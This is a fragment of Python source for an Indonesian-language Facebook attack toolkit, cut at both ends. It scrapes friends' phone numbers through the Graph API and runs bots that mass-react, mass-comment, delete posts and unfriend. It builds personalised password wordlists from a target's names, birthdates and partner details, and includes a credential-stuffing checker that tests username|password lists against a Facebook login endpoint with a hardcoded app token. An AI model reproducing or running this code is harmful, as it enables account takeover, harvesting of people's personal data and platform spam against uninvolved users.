x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def hpfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hpfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Bot Reactions Target Post'
print '\x1b[1;37;40m2. Bot Reactions Grup Post'
print '\x1b[1;37;40m3. Bot Komen Target Post'
print '\x1b[1;37;40m4. Bot Komen Grup Post'
print '\x1b[1;37;40m5. Mass delete Post'
print '\x1b[1;37;40m6. Terima permintaan pertemanan'
print '\x1b[1;37;40m7. Hapus pertemanan'
print '\x1b[1;31;40m0. Kembali'
print
bot_pilih()
def bot_pilih():
bots = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Jangan kosong'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mTidak ada'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mMulai menghapus postingan unfaedah\x1b[1;97m ...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mGagal'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mTerhapus'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print '\x1b[1;91m[!] Tidak ada permintaan pertemanan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Gagal'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mTerhapus\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Buat postingan'
print '\x1b[1;37;40m2. Buat Wordlist'
print '\x1b[1;37;40m3. Akun Checker'
print '\x1b[1;37;40m4. Lihat daftar grup'
print '\x1b[1;37;40m5. Profile Guard'
print
print '\x1b[1;97m ->Coming soon<-'
print
print '\x1b[1;31;40m0. Kembali'
print
pilih_lain()
def pilih_lain():
other = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mTidak ada'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mKetik status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Jangan kosong'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 40 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Gagal membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 40 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mPemisah \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mMati\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 40 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Grup \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
